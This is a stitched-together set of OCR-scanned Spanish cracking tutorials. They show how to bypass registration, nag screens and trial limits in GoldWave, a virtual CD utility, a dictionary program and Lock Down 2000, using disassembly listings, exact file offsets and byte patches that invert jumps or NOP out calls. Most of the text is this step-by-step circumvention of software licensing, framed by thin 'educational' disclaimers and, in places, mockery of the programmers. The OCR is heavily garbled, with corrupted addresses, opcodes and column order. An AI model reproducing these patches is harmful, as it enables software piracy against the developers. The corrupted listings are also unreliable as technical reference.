un bpx en createwindow o poniendo un bmsg wm_destroy en el handle de la ventana una vez 
creada (hay buenos tutos de como hacerlo), de cualquier forma que uses llegas a un call 


004055E9 que tambien hay que nopear y eso a estas alturas seguro que ya sabes hacerlo. 


Bueno, saludos a toda la peña, aprendiendo poco a poco gracias a todas vuestras aportaciones y a paginas como esta 
del genial Karpoff........... Gracias. 


Nota: Tutorial realizado con el unico fin de comprender las protecciones software y el modo de evitarlas en ningun 
modo se persigue otro fin; si utilizas un programa o lo encuentras util DEBERIAS REGISTRARLO. 
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Programa: GoldWave 4.0b 

PROTECCION: Número de serie 

Objetivo: Registrar el programa 

Descripcion: Tal tal tal 

Dificultad: Principiante 

DOWNLOAD : http: //xxxx 

Herramientas: W32Dasm 8.9 - UltraEdit 7.20 

CRACKER: CrkViz FECHA: 02/10/2000 


INTRODUCCION 


El programa que vamos a crakear hoy, sirve para edicion musical, no tiene ningun tipo de limitación, 
es totalmente funcional, pero para hacer más interesante este tutorial hice que la ventana de registro 
se convierta en una especie de generador de llaves. 


AL ATAKE 


Entremos al programa y vallamos a Options de la barra de menú y hacemos click en Register En la ventana de 
registro que nos aparece tenemos tres campos: First Name, Last Name y Password, en donde escribiremos 

cualquier cosa y nos aparecera un mensaje que dice ''Invalid registratión! Please check your password and try 
again.'' Abrimos el w32dasm y buscamos en Strn Ref esa cadena. 


* Referenced by a 


| :0042C710(C) 


| 

:0042C78F 
:0042C795 
:0042C796 
:0042C79B 
:0042C79C 


:0042C79E 


8D9594FEFFEFF 
92 


E869F8FFEFF 


59 
84C0 


0r8g5A1000000 


(U)nconditional or 


lea edx, dword ptr [ebp+EFErErEFF 
push edx 

call 0042C004 

pop ecx 

test al, al 


(C)onditional Jump at Address: 


E94] 


jne 00420845 ======-=-- > Nuestro salto 


* Possible StringData Ref from Data Obj ->"Register" 


:0042C7A4 8B150C594D00 mov edx, dword ptr [004D590C] 


:0042C7AA 8B4666 mov eaxX, dword ptr [esi+66] 
:0042C7AD 8B00 mov eaxX, dword ptr [eax] 
:0042C7AF 6A30 push 00000030 

:0042C7B1 52 push edx 


Aparecemos aquí 


* Possible StringData Ref from Data Obj ->"Invalid registration! Please" 
-=>"check your password and 


try" ->"again." 
:0042C7B2 68AE624D00 push 004D62AE 

:0042C7B7 8B500C mov edx, dword ptr [eax+0C] 
:0042C7BA 52 push edx 

:0042C7BB 8B4868 mov ecx, dword ptr [eax+68] 
:0042C7BE 51 push ecx 

:0042C7BF E8C2710500 call 00483986 

:0042C7C4 836F1C05 sub dword ptr [edi+1C], 00000005 
:0042C7C8 83471C05 add dword ptr [edi+1C], 00000005 
:0042C7CC 8B4304 mov eax, dword ptr [ebx+04] 
:0042C7CF 83C414 add esp, 00000014 

:0042C7D2 8368FC04 sub dword ptr [eax-04], 00000004 
:0042C7D6 8B13 mov edx, dword ptr [ebx] 
:0042C7D8 836AFC04 sub dword ptr [edx-04], 00000004 
:0042C7DC 836F1C04 sub dword ptr [edi+1C], 00000004 
:0042C7E0 83471C04 add dword ptr [edi+1C], 00000004 
:0042C7E4 836F1C03 sub dword ptr [edi+1C], 00000003 
:0042C7E8 6A00 push 00000000 

:0042C7EA 53 push ebx 


Se fijaron en la dirección 0042C79E que está más arriba , tenemos un salto condicional jne 00420843 , veamos 
a donde nos lleva. 


Aparecemos aquí: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0042C79E(C) 


:0042C845 8D8594FEFFFF lea eax, dword ptr [ebp+FEFFFFE94] 
:0042C84B 50 push eax 

:0042C84C E8B3EFTFFEF call 0042C004 

:0042C851 59 pop ecx 

:0042C852 84C0 test al, al 

:0042C854 0F84AB000000 je 0042C905 

:0042C85A 660747106800 mov [edi+10], 0068 


* Possible StringData Ref from Data Obj ->"goldwave.ini"> Archivo sospechoso 


:0042C860 8B1500064E00 mov edx, dword ptr [004E0600] 
:0042C866 52 push edx 


* Possible StringData Ref from Data Obj ->"Register" 


:0042C867 8B0DOC594D00 mOV ecx, dword ptr [004D590C] 
:0042C86D 51 push ecx 

:0042C86E 8D8538FFEFFF lea eax, dword ptr [ebp+FEFEFFFF38] 
:0042C874 50 push eax 

:0042C875 E8F2700800 call 004B396C 

:0042C87A 83C40C add esp, 0000000€C 

:0042C87D FF471C inc [edi+1C] 

:0042C880 660747107400 mov [edi+10], 0074 

:0042C886 C6865707000001 mov byte ptr [esi+00000757], 01 
:0042C88D 8D9594FEFFFF lea edx, dword ptr [ebp+FEFFFFE94] 
:0042C893 52 push edx 


* Possible StringData Ref from Data Obj ->"First" 


:0042C894 8B0D10594D00 mOv ecx, dword ptr [004D5910] 


:0042C89A 51 


:0042C89B 8D8538FFFFEF 


:0042C8A1 50 
:0042C8A2 E82D720 
:0042C8A7 83C40C 


800 


:0042C8AA 8D95ADFEFFFF 


push ecx 

lea eax, dword ptr 
push eax 

call 004B3AD4 

add esp, 0000000C 
lea edx, dword ptr 


* Possible StringData Ref from Data Obj ->"Last" 


:0042C8B0 8B0D145 


94D00 


:0042C8B6 8D8538FFFFEF 


:0042C8BC 52 
:0042C8BD 51 
:0042C8BE 50 


:0042C8BF E810720800 


:0042C8C4 83C40C 
:0042C8C7 8D95C6F 


EFFFF 


* Possible String 


:0042C8CD 8B0D185 


mOv ecx, dword ptr 
lea eax, dword ptr 
push edx 

push ecx 

push eax 

call 004B3AD4 

add esp, 0000000C 
lea edx, dword ptr 


Data Ref from Data Obj ->"Password" 


94D00 


:0042C8D3 8D8538FFFFEF 


:0042C8D9 52 
:0042C8DA 51 
:0042C8DB 50 


:0042C8DC E8F3710800 


:0042C8E1 83C40C 


:0042C8E4 8D9538FFFFEF 


:0042C8EA 52 


:0042C8EB E814710800 


:0042C8F0 59 
:0042C8F1 FF4F1C 
:0042C8F4 6A02 


:0042C8F6 8D8D38FFFFEFF 


:0042C8rc 51 


:0042C8FD E8B2700800 


:0042C902 83C408 


* Referenced by a 
| :0042C854 (C) 


(U)nconditional or 


mov ecx, dword ptr 
lea eax, dword ptr 
push edx 

push ecx 

push eax 

call 004B3AD4 

add esp, 0000000C 
lea edx, dword ptr 
push edx 

call 004B3A04 

pop ecx 

dec [edi+1C] 

push 00000002 

lea ecx, dword ptr 
push ecx 

call 004B39B4 

add esp, 00000008 


* Possible StringData Ref from Data Obj ->"Register" 


:0042C905 8B150C594D00 


:0042C90B 8B4666 
:0042C90E 8B00 
:0042C910 6A40 
:0042C912 52 


mov edx, dword ptr 
mov eax, dword ptr 
mov eax, dword ptr 
push 00000040 

push edx 


[ebp+FFFFFF38] 


[ebp+FFFFFEAD] 


[004D5914] 
[ebp+FFFFFF38] 


[ebp+FFFFFEC6] 


[004D5918] 
[ebp+FFFFFF38] 


[ebp+FFFFFF38] 


[ebp+FFFFFF38] 


(C)onditional Jump at Address: 


[004D590C] 
[esi+66] 
[eax] 


* Possible StringData Ref from Data Obj ->"GoldWave is now 


registered. 


:0042C913 68EF624D00 


:0042C918 8B500C 
:0042C91B 52 
:0042C91C 8B4868 
:0042C91F 51 


:0042C920 E861700500 


:0042C925 83C414 


:0042C928 660747108000 


:0042C92E 6A00 
:0042C930 8B4666 
:0042C933 8B10 
:0042C935 8B4A0C 
:0042C938 51 


Se las hago facil. Lo único que deberemos hacer para convertir la ventana de registro en un generador de llaves 


push 004D62EF 

mov edx, dword ptr 
push edx 

mov ecx, dword ptr 
push ecx 

call 00483986 

add esp, 00000014 
mov [edi+10], 0080 
push 00000000 

mov eax, dword ptr 
mov edx, dword ptr 
mov ecx, dword ptr 
push ecx 


-=>"Thank ->you!" 


[eax+0C] 


[eax+68] 


[esi+66] 
[eax] 
[edx+0C] 


es modificar el primer salto del cual hablamos (jne 00420845) de la dirección 0042C79E por un je 
0042C845 en el UltraEdit o en cualquier otro editor hexadecimal y guardar los cambios. 

Entonces escriban en la ventana de registro en First Name y Last Name cualquier cosa (en Password no pongan 
nada) y generará la Password correspondiente pero nosotros no la veremos por que la almacena el el archivo 
Goldwave.ini y cada vez que arranquemos el programa lo examinará y comprovará si los datos de registración 
son correctos. 


Por ejemplo: 
First Name: CrkViz 


Last Name: TC 
Password: ICPQMY 


"Gold Wave is now registered. Thank you!" 


Listo programa registrado!! Espero que no se mareen entre tanto código, ya que siempre trato de hacerlo de 
forma organizada y en lo posible facil para puedan entenderlo. 


Hasta la próxima! 
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Notas del autor: 
Este material a sido creado con fines educativos. 


El autor no se hace responsable del uso que le pueda dar. 
Si realmente te gusta el programa o juego compralo. 
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berremientas: | Softice v3x ,w32dasm 8.9, editor hexadecimal, filemon. 


INTRODUCCION 


Es una utilidad que hace comprimir un cd en el disco duro creando una unidad cd-rom virtual en el 
sistema, hace que este cd comprimido crea que es una verdadera unidad de cd-rom.¡Qué bien me 
explico!, es un milagro si me entendeis... 


AL ATAKE 


1- Cargamos el ejecutable que ese CDMAN.EXE (importante el dato), este es un 
programa muy molesto ya que siempre nos aparecen nags-screen recordatorios de la 
versión trial, indicandonos los dias que nos faltan para que el programa expire. 


2-Podemos ver que función llama a estos nags-screen y a la llamada que lleva la 
"cuenta atrás" de los dias que faltan para que termine el periodo de prueba. Vemos 
que siempre aparece un nag-screen cuando vamos a crear una imagen de un cd, este 
será el usado para "cazar" esa función. Cargado el SI, ejecutamos el programa 
objetivo, y hacemos un breakpoint, hacemos unas pruebas y vemos que solo funciona 
este : 


bpx messageboxa 


Antes de que aparezca el nag-screen, saltamos en Sl otra vez,con F12 vemos de donde 
se ha llamado llegamos hasta: 


Salta desde un ¿archivo? llamado cdshell, pero no desde cdman.exe ( nuestro 
programa ). 


3-Vamos a ver qué es ese cdshell, cargamos el programa file monitor ( filemon ), 
hacemos que monitorice el programa cdman para ver a que ficheros llama. El 
resultado es que llama muchas veces a una libreria (dll) : 


CAwindowsisystemicdshell.dll 


Pues este es el archivo que tendrá toda la información necesaria para que el 
programa sepa que es una versión trial, con tiempo limitado, y que debe poner 
nags-screens. 


4-No vamos a desensamblar todavia este archivo, sino que con el SI vamos a ver que 
pasa cuando se cambian algunos saltos, y que llamadas interesantes hay. 


5-Cuando el SI salta despues del nag-screen vemos una llamada: call messageboxa, 
exploramos hacia arriba con control+flecha arriba, para ver qué saltos y llamadas 
hay por ahí. 


6-Ponemos un bpx al principio de esta cadena. Encontramos : 


10002c8f 90 nop 


10002cae e81d5c50000 call 100088d0 


Al explorar esta llamada nos encontramos con una llamada a 
[KERNEL32!GetS ystemTime]==>que será las que llevan la cuenta atrás del prgograma. 
Tambien nos encontramos con 2 saltos condicionales que no saltan, son: 


10008916 7477 ¡zz 1000898f 
10008956 7437 jz 1000898f 


Estos 2 saltos no se producen, para comprobar hacia donde saltan cambiamos el flag 
para que salten: r fl z, al hacer ésto salta el mensaje en el programa de time 
expired. No me gusta nada. 


7-Al salir de esta llamada nos encontramos con 2 saltos condionales. El 1” vemos 
que no salta nunca, porque: 


10002cb9 83c404 add esp,04 

10002cbc 85c0 test eax,eax --->son valores iguales=>el flag será O siempre 
10002cbe 0f8484000000 jf 10002d78 --->no salta 

10002cc4 8b44242c mov eax,[esp+2c] 


Este salto no salta y nos lleva más abajo.Hay otro salto más abajo que si salta nos 
lleva al error, podemos comprobarlo, cambiar estos dos saltos posteriores no nos 
llevan a buen sitio. Pero,al cambiar este salto (10002cbe), el que "nunca" se 
produce si perece tener éxito.Al cambiarlo con r fl z, y al hacer que el programa 
siga su curso con ES, en el programa no aparece ningún aviso y sigue su curso 
normal sin nags recordatorios. 


8-Parece que todo ha acabado ya pero, ¿qué pasa al adelantarle la hora al reloj del 
ordenador? Pues que, no nos hemos saltado esa cuenta atrás y el programa ha 

terminado su tiempo de evaluación. NO HAY PROBLEMA, si nos fijamos en la llamada 
del punto 6- donde hace referencia a la cuenta atrás y en los 2 cambios que habia, 


¿qué pasó cuando los cambiamos? la solución será ahora , no invertirlos sino 
nopearlos para que no salten a ningún sitio. 


9- Ya solo nos falta cambiar los bytes necesarios y ya está, para ello usamos el 
wdasm para ver los offset de las direcciones, y un editor hexadecimal para 
cambiarlos. Os recuerdo que debemos de cambiarlo en el archivo cdshell.dll y no en 
cdman.exe (aqui no encontrariamos esas direcciones). 


NOTA 1: Primero decir que esto es para el estudio de la protección del programa, 
para poder evaluarlo mejor, y que si os gusta,debeis comprarlo! ;-) 


NOTA 2: Si teneis alguna duda o sugerencia o crítica, no se, lo que querais, 
hacermela saber, porfa... kamui_Clatinmail.com. 
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Programa: [| Peonza DD 


INTRODUCCION 


hola amigos. esta vez nos vemos en mi noveno tutorial. he recibido un mail diciéndome que no podía crackear 
este programa y por esa razón hago este tutorial. antes de leerlo, traten a ver si pueden crackearlo ustedes solos, 
realmente es muy fácil aunque tiene lo suyo, cosa que puede confundir a alguien con muy poca experiencia. 
también he recibido algunos mails diciendo que cambiaban un je por un jne y podía registrar el programa, pero 
cuando lo cerraban y lo volvían a iniciar el programa ya no estaba registrado. espero poder aclararles esta duda 
más abajo. 


creo que este programa sirve para crear tus propios diccionarios. si es así, este uso lo veo un poco absurdo, escribir 
miles de palabras cuando podemos utilizar los diccionarios del word. pero lo peor no es esto, lo peor es que los 
programadores quieren que les paguemos por producir su horripilante software que para lo único que sirve es para 
practicar técnicas de cracking. si esta es su utilidad pues adelante, vamos a crackear!!!, 


ejecutamos el programa y... esto no me gusta nada. nag diciéndonos que nos quedan 13 usos. hmmm, todo huele mal. ejecutémoslo 
14 veces a ver que pasa. 1, 2, 3, 4, 5, ... 14: 


(Xx) Now you have to register. 


y luego nos aparece el programa con un montón de funciones deshabilitadas, en otras palabras, el programa ya no sirve para nada. 
pulsemos sobre el botón register y aparece una horrible ventanita para introducir nuestro código. yo pondré lo que se muestra en la 


imagen: 


Register El 


See help for detals. 


[No me gusta este programal!! Register. | 


pulsamos sobre register y nos aparece una ventana diciendo "no me gusta este programa!!!" is not a valid integer value. ataquemos con 
el w32dasm. primero que nada hagamos una copia del ejecutable. luego desensamblamos y busquemos en las string references algo 
sospechoso. casi al final encontramos una que dice "unregistered. you have", esto era lo que nos recordaba que nos quedaban tantos 
usos. hagamos doble clic sobre ella y aparecemos en esta zona: 


:01061910 e8d303ffff call 01051ce8 
:01061915 e84a20faff call 01003964 


* referenced by a (u)nconditional or (c)onditional jump at address: 


| :010618fe (c) 

| 

:010619la 813d98c2060110270000 cmp dword ptr [0106c298], 00002710 

:01061924 7473 jge 01061999 

:01061926 £f0d98c20601 dec dword ptr [0106c298] 

:0106192c e85ffeffff call 01061790 

:01061931 c605a0c0060100 mov byte ptr [0106c0a0], 00 

:01061938 8b1d98c20601 mov ebx, dword ptr [0106c298] 

:0106193e 85db test ebx, ebx 

:01061940 7dle jge 01061960 <=======-=-- el salto al que hacen referencia los mensajes. 
:01061942 c605a1c0060101 mov byte ptr [0106c0a1], 01 

:01061949 6a00 push 00000000 

:0106194b 668b0dd8190601 mov cx, word ptr [01061908] 

:01061952 b201 mov dl, 01 

* possible stringdata ref from code obj ->"now you have to register." <--=====---- zona interesante 
| 

:01061954 b80c1a0601 mov eax, 0106la0c 

:01061959 e88a03f£fff call 01051ce8 

:0106195e eb40 jmp 010619a0 


* referenced by a (u)nconditional or (c)onditional jump at address: 


[E OLOGLIIO (0) E mensaje llamado desde 01061940. 
:01061960 6a00 push 00000000 

* possible stringdata ref from code obj ->"unregistered.you have "<====== lo que buscábamos 
:01061962 68301a0601 p push 01061a30 

:01061967 8d55£8 lea edx, dword ptr [ebp-08] 

:0106196a 8bc3 mov eax, ebx 

:0106196c e8676afaff call 010083d8 

:01061971 f££75£8 push [ebp-08] 

* possible stringdata ref from code obj ->" launches left" S-niiinum---- esta y la de arriba estaban en el 
| mismo mensaje 

:01061974 68501a0601 push 01061a50 

:01061979 8d45fc lea eax, dword ptr [ebp-04] 

:0106197c ba03000000 mov edx, 00000003 

:01061981 e85624faff call 01003ddc 

:01061986 8b45fc mov eax, dword ptr [ebp-04] 

:01061989 668b0d601a0601 mov CxX, word ptr [01061a60] 

:01061990 b202 mov dl, 02 

:01061992 e85103ffff call 01051ce8 

:01061997 eb07 jmp 01061920 


está claro que el los mensajes de error fueron llamados desde el salto ubicado en 01061940. pero ese salto es un salto incondicional. ¿que 


tal si lo cambiamos por eb para que no salte solo si es mayor o igual sino que salte siempre?, probemos. abramos el hex workshop 
insertemos el offset del salto (60d40) y cambiamos 7dle por ebld. bien, probamos el programa y... ja!ja!ja!ja!ja!ja! genial, ja!ja!ja!ja!, 


quisiera ver la cara del programador si nos observara ja!ja!ja!, lo que hicimos con su software. iniciamos y nag diciendo "you have 25 
uses left", ya extendimos los usos. iniciamos de nuevo y nag diciendo "you have 26 uses left" y luego 27 uses left, y 28, 29, 30, 
ja!ja!ja!ja!. esto del cracking me encanta!!!. pero no hicimos el crack perfecto, además, nos podemos reír todo lo que queramos 
(ja!ja!ja!ja!ja!ja!ja!) de lo que le hicimos a los programadores pero si usamos mucho el programa (cosa que dudo) se vuelve incómodo 
tener que apretar "aceptar" cada vez que iniciemos el programa, así que vamos a hacer el crack perfecto. 


aquí viene lo que pudo confundir a más de uno. si ven arriba del salto que cambiamos, hay otro aviso de que todas las nags y las 
limitaciones fueron llamadas desde un salto ubicado en la dirección 010618fe. pues vamos a esa dirección. goto/go to code location y 
escribimos la dirección. apareceremos aquí: 


:010618de c70598c206010£000000 mov dword ptr [0106c298], 0000000f 

:010618e8 e8a3feffff call 01061790 

:010618ed e%ae000000 jmp 010619a0 

* referenced by a (u)nconditional or (c)onditional jump at address: <==========----- no nos interesa 
| :010618dc (c) 

| 

:010618f2 e8elfdffff call 010616d8 

:010618£7 803da8c006010c cmp byte ptr [0106c0a8], Oc 

:010618fe 74la je 01061 91 aran nuestro saltito 
:01061900 6a00 push 00000000 

:01061902 668b0dd8190601 mov CxX, word ptr [010619d8] 

:01061909 b201 mov dl, 01 


* possible stringdata ref from code obj ->"charset.cfg missing or corrupt" 


:0106190b b8e4190601 mov eax, 010619e4 
:01061910 e8d303ffff call 01051ce8 
:01061915 e84a20faff call 01003964 


¿que les parece si cambiamos ese salto por el opuesto?, probemos. offset, 6Ocfe. abrimos hex workshop edit/goto y escribimos el offset. 
cambiamos el salto por 751la, ejecutamos el programa y banggg "charset.cfg missing or corrupt". no modificamos el salto indicado. para 
este tipo de situaciones es que hacemos la copia del ejecutable. la desensamblamos y vemos más arriba de ese salto, en esta zona: 


:010618a9 66 byte 66h 
:010618aa 69 byte 69h 
:010618ab 67 byte 67h 
* referenced by a call at addresses: a ahora se resuelve todo... 


|:01065f0c , :01065faf 


:010618ac 55 push ebp 

:010618ad 8bec mov ebp, esp 

:010618af 6a00 push 00000000 

:010618b1 6a00 push 00000000 

:010618b3 53 push ebx 

:010618b4 33c0 xor eaxX, eax 

:010618b6 55 push ebp 

:010618b7 68bb190601 push 010619%bb 

:010618bc 64ff30 mov dword ptr fs: [eax], esp 
:010618c2 có605a0co060101 mov byte ptr [0106c0a0], 01 
:010618c9 c605a1c0060100 mov byte ptr [0106c0a1], 00 
* possible stringdata ref from code obj ->"author" 

| 

:010618d0 b8d0190601 mov eax, 010619d0 

:010618d5 e8babcfaff call 01008594 

:010618da 84c0 test al, al 

:010618dc 7414 je 010618f£2 

:010618de c70598c206010£000000 mov dword ptr [0106c298], 0000000f 
:010618e8 e8a3feffff call 01061790 

:010618ed e%ae000000 jmp 010619a0 


creo que ahora la cosa está clara. todas las limitaciones de usos, las nags, mensajes de error, etc fueron llamadas desde dos calls 
ubicadas en las direcciones O1065f0c y O1065faf. lo que tenemos que hacer es parchear esas calls para que nada de esto se ejecute o sea 
para no tener ninguna limitación. bien, goto/goto code location y escribimos la dirección de la primera call o sea O1065f0c. ahí tenemos la 
call. ahora anotamos el offset (6530c) y vamos al hex workshop. ya saben, edit/goto escribimos el offset y cambiamos e89bboffff por 
9090909090. volvemos al w32dasm, y vamos a la segunda dirección o sea O1065faf. ahí está la otra call. anotamos el offset (653af), 
vamos al hex workshop, lo escribimos y cambiamos esf8b8ffff por 9090909090. ahora guardamos el ejecutable por ejemplo como 


crackeado.exe y lo probamos. listo, el programa queda totalmente funcional. podría parecer que no hicimos bien el crack ya que aunque 
el botón de register está deshabilitado sigue ahí. pero aunque nos hubiéramos registrado "legalmente" el botón seguiría ahí. ¿como lo sé?, 
abran el archivo de ayuda y miren las imágenes del programa registrado. se ve igual que el que hemos crackeado. 


nuevo y no está registrado. pero ¿porqué?. pues porque parchearon el salto equivocado. parchearon el salto que si saltaba, mostraba el 
mensaje de error. este es el típico error de los newbies. lo único que hicieron fue que nunca salte, por lo tanto el programa siempre 
mostrará el mensaje de "gracias por registrarse!!!" pero en realidad no está registrado. si con el w32dasm encontraron el lugar donde se 
realiza la comprobación, les recomiendo que no cambien ningún salto (salvo que quieran distribuir el crack) sino que pongan un break 
point en el lugar donde se realiza la rutina de comprobación y que vayan viendo el valor de los registros ya que casi siempre se puede 
hallar el serial válido de esta manera, además el crack será más "noble" que con los parcheos. 


me despido pero no sin antes dar las gracias al grupo k-for, a profesor x por su fabulosa compilación y por toda su ayuda, a karpoff, por 
su gran apoyo y sus consejos, y a txeli, por su apoyo moral y por pasarme algunos programas interesantes, a crkviz (saludos amigo!!!). y 
finalmente gracias a ustedes por leer mi manual. nos vemos en el siguiente. 


astalavista 


página oficial del grupo k-for: http: //pagina.de/kfor 
mi dirección de e-mail: dek ointWhotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria 


inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 
Programa: [| 'eckDow200vwo | 


introduccion 


hola que tal ya que vamos por la dieciseisava entrega ( ¡¡yay!! no pensaba que hubiera escrito tanto) el 
programa que crackearemos es el lock down 2000. a continuacion la descripción: 


programa: lock down 2000 v7.0 ubicación: www.lockdown.com 


protección:time limit, serial, empaquetado 


primero abrimos el programa y vemos que cuando se abre es muy lento y ademas aparece la ventana otra vez,no sotros 
adelantamos el reloj unos 31 días, el programada un anuncio "this trial period on this demo of lock down 2000 has 
expired" , vamos a desamblarlo pero no pasa nada, bueno usamos el gettype y analizamos el archivo, vemos: 


> H gettyp 2.56 4 > -- + copyright (c) 1997-99 by phax + --- 
- --- H phaxO writeme.com + o ------- + http://surf.to/phax + --- 
o +t free edition + --- 


- [carchivos de programaMockdown 2000 v7.0OMdockdown2000.exe] ----- 
dos executable file - 492032 bytes 


portable executable (starting at 256 for 491776 bytes) 


packer: aspack 2.000 (?) 

packer: aspack 2.001 (2?) 

packer: aspack 2.100 

calculated entrypoint: 484865 / 00076601h (rva: 001f8001h) 
required cpu type: 80386 

requires any version of win32 

flags: 

file is executable 

line numbers stripped from file 

local symbols stripped from file 

32 bit word machine 

linker version: 2.25 

objects (object align = 00001000h): 

name virt size rva phys size phys ofs 

code 000d7000h 00001000h 0004f£000h 00000400h 
data 00003000h 000d8000h 00000e00h 0004f400h 
bss 000b7000h 000db000h 00000000h 00050200h 
.idata 00003000h 00192000h 00001000h 00050200h 
.tls 00001000h 00195000h 00000000h 00051200h 
.rdata 00001000h 00196000h 00000200h 00051200h 
.reloc 0000£000h 00197000h 00000000h 00051400h 
.rsrc 00052000h 001a6000h 00025200h 00051400h 
.Idshow 00002000h 001f8000h 00001c00h 00076600h 
.data 00001000h 001fa000h 00000000h 00078200h 


- files identified: 1 of 1 (100.00%) 
- total time: 50.0 ms (0.0 ms/file) (50.0 ms lost) 


al ver esto sabemos que el programa esta empakado con aspack 2.001 bueno yo para desempakarlo usé un 
desempakador automatico que se consigue en programers tools se llama "unaspack" soporta 1.00 y el 2.01, o tambien 
puedes usar el procdump en la opción unknow pero después va a ver que redireccionar el punto de entrada, después de 
desempakarlo nos metemos en procdump, pe editor, presionamos sections,en la seccion cuyo nombre es code presiona 
el boton derecho del mouse edit sections, en donde dice offset aparece cO000040 cambialo por e0000020 y hací 
elimininamos el truco antidesamblador ahora que ya estamos listos !a trabajar! 


lo desamblamos y buscamos en strnref y busacamos, buscamos, uhh esto parece interesante 1Id2kreg.ini ( si las cosas 
son así tal como van podemos atacar el registro y simular que estamos registrados) vermos este codigo: 


* possible stringdata ref from code obj ->"ld2kreg.ini" 


:004a4a73 b9d84e4a00 mov ecx, 004a4ed8 

:004a4a78 b201 mov dl, 01 

:004a4a7a a1909e4700 mov eax, dword ptr [00479e90] 
:004a4a7f e8b454fdff call 00479138 

:004a4a84 8bd8 mov ebx, eax 

:004a4a86 6200 push 00000000 

:004a4a88 8d45€0 lea eax, dword ptr [ebp-20] 
:004a4a8b 50 push eax 


* possible stringdata ref from code obj ->"register" 


:004a4a8c b9ec4e4a00 mov ecx, 004a4eec 


* possible stringdata ref from code obj ->"register" 


:004a4a91 baec4e4a00 mov edx, 004a4eec 
:004a4a96 8bc3 mov eax, ebx 

:004a4a98 8b30 mov esi, dword ptr [eax] 
:004a4a9a ff16 call dword ptr [esi] 


:004a4a9c 8d45dc lea eax, dword ptr [ebp-24] 
:004a4a9f esb4f9ffff call 00444458 

:004a4aa4 8b55dc mov edx, dword ptr [ebp-24] 
:004a4aa7 8b4580 mov eax, dword ptr [ebp-20] 
:004a4aaa escdf5f5ff call 0040407 

:004a4aaf 7537 ¡ne 004a4ae8 

:004a4ab1 68004f4400 push 004a4f00 
:004a4ab6 8d45dc lea eax, dword ptr [ebp-24] 
:004a4ab9 es9afoffff call 0O4a4458 

:D04a4abe ff75dc push [ebp-24] 

:004a4acl 680c4f4a00 push 004a4f0c 
:004a4acó 8d45€0 lea eax, dword ptr [ebp-20] 
:004a4ac9 ba03000000 mov edx, 00000003 
:004a4ace esS9f5f5ff call 0O40402c 

:004a4ad3 8b45e0 mov eax, dword ptr [ebp-20] 
:004a4ad6 50 push eax 


* possible stringdata ref from code obj ->"register" 


:004a4ad7 b9ec4e4a00 mov ecx, 004adeec 


* possible stringdata ref from code obj ->"register" 


:004a4adc baec4e4a00 mov edx, 004a4eec 
:004a4ael 8bc3 mov eax, ebx 

:004a4ae3 8b30 mov esi, dword ptr [eax] 
:004a4ae5 ff5604 call [esi+04] 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:004a4aaf(c) 


:004a4ae8 8bc3 mov eax, ebx 

:004a4aca es5 1e5f5ff call 00403040 

:004a4aef 6800414200 push 004a4f00 

:004a4af4 8d45d8 lea eax, dword ptr [ebp-28] 

:004a4af7 esScfoffff call 0044458 

:004a4afe ff75d8 push [ebp-28] 

:004a4aff 680c4f4a00 push 004a4f0c 

:004a4b04 8d45dc lea eax, dword ptr [ebp-24] 

:004a4b07 ba03000000 mov edx, 00000003 

:004a4b0c es 1bf5f5ff call 0040402c 

:004a4b11 8b553dc mov edx, dword ptr [ebp-24] 

:004a4b14 8b45e0 mov eax, dword ptr [ebp-20] 

:004a4b17 es60f5f5ff call 0040407 

:004a4b1c 7507 ¡ne 004a4b25 "este salto cabron verifica si estamos registrados, el pasword, el nombre y cosas" 
:004a4b1le b301 mov bl, 01 

:004a4b20 e980030000 ¡mp 004a4ea5 "nos envia a un ret al hacerlo aparecemos como si estuvieramos registrados" 


lo que hay que hacer es cambiar jne 004a4b25 por jne 004a4b1e para que continue 


lo parcheamos y aparece sin el boton para registrarse y todo funcional ecepto de que tarda todavia para iniciarse bueno 
busquemos una solucion al estorbo 


bueno después de usar el zencracking (pongo esto ya que casi que lo encuentro de mera casualidad pero así son las 
cosas, y de verdad no recuerdo como lo halle creo que fué una llamada) se acuerdan del mensaje de expiracion "this 
trial period on this demo of lock down has expired" lo buscamos y aqui hay algo al parecer el programa piensa que no 
estamos registrados y deja el programa sin funcion, ahora vemos: 


* possible stringdata ref from code obj ->"the trial period on this demo " 


->"of lockdown 2000 has expired." 


:004c0a18 b850294c00 mov eax, 004c2950 

:004c0a1d esb25ff9ff call 00456944 

:004c0a22 a1509b4d00 mov eax, dword ptr [004d9b50] 
:004c0a27 8b00 mov eax, dword ptr [eax] 

:004c0a29 8b10 mov edx, dword ptr [eax] 

:004c0a2b ff92cc000000 call dword ptr [edx+000000cc] 
:004c0a31 eb17 ¡mp 004c0a4a 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:004c0a0a(c) 


:004c0a33 8b55fc mov edx, dword ptr [ebp-04] 

:004c0a36 8bc3 mov eax, ebx 

:004c0a38 e8b7910000 call 004c9bf4 

:004c0a3d b201 mov dl, 01 

:004c0a3f 8b8354050000 mov eax, dword ptr [ebx+00000554] 
:004c0445 esa229f9ff call 004533ec 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
1:004c0a02(c), :004c0a31(u) 


:004c0a4a 33c0 xor eax, eax 

:004c0a4c 8945f8 mov dword ptr [ebp-08], eax 
:004c0a4f 6200 push 00000000 

:004c0a51 esb65cffff call 0O4b670c 

:004c0a56 8bf8 mov edi, eax 

:004c0a58 eb16 ¡mp 004c0a70 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:004c0a78(c) 


:004c0a5a 6400 push 00000000 
:004c0a5c esabScffff call 0O4b670c 
:004c0a61 8bf8 mov edi, eax 
:004c0463 ff45f8 inc [ebp-08] 
:004c0a66 68e8030000 push 000003e8 


* reference to: kernel32.sleep, ord:0000h 


:004c0a6b esfc64f4ff call 0OO406f6c 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:004c0a58(u) 


:004c0a70 85ff test edi, edi 

:004c0a72 7d06 jge 004c0a7a 

:004c0a74 837df80a cmp dword ptr [ebp-08], 0000000a 

:004c0a78 7ce0 jl 004c0aSa "esta llamada llama a la funcion sleep del kernel" 


* referenced by a (u)nconditional or (c)onditional jump at address: 
[:004c0a72(c) 


:004c0a7a 85ff test edi, edi 
:004c0a7c 7036 jl 004c0ab4 
:004c0a7e es495effff call 0O4b68cc 
:004c0a83 40 inc eax 

:004c0a84 752e ¡ne 004c0ab4 
